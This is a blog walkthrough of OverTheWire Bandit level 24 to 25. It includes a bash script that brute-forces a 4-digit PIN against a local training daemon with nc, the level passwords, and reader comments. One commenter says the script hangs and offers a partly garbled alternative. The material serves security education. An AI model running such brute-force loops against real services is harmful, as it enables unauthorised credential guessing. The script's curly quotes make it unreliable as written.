OverTheWire: Bandit Level 24 to Level 25

Level goal: A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

bandit24_2

The following is my script to perform this brute-forcing techqnies,

#!/bin/bash

pass24=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

pin=0

while [ $pin -lt 10000 ]; do

echo “Attempting PIN: $pin”

attempt=”$(echo $pass24 $pin | nc localhost 30002)”

if ! [[ $attempt == *”Wrong!”* ]]; then

echo -ne “$attempt”

break

fi

((pin++))

done

The script will iterate through each possible PIN to perform brute forcing in identifying the secret pincode of bandit25.

bandit24_1

The password to gain access to the next level is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG.


3 Comments

  • Pingback: OverTheWire: Bandit Write-up | My Learning Journey

  • Richardn

    February 15, 2020

    This solution doesn’t work because the shell will be stuck at line:
    attempt=”$(echo $pass24 $pin | nc localhost 30002)”
    The daemon receives a single trial, outputs a “Wrong!” and waits for the next input, rendering the nc command not finished until a timeout after around 10secs
    So your shell takes 10secs for a single trial…

    For me ,I echoed all the possible trials into a file called trials by a shell, then:
    nc localhost 30002 results
    uniq -u results

    Reply
    • kongwenbin

      August 17, 2021

      Hi Richardn, my solution works for me back then when I was doing it hands-on, not sure what happened now, I seen a few other comments on something not working with their PuTTY session. Thanks for sharing your solution, I have approved it so others can see it too, I appreciate your sharing 🙂

      Reply

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.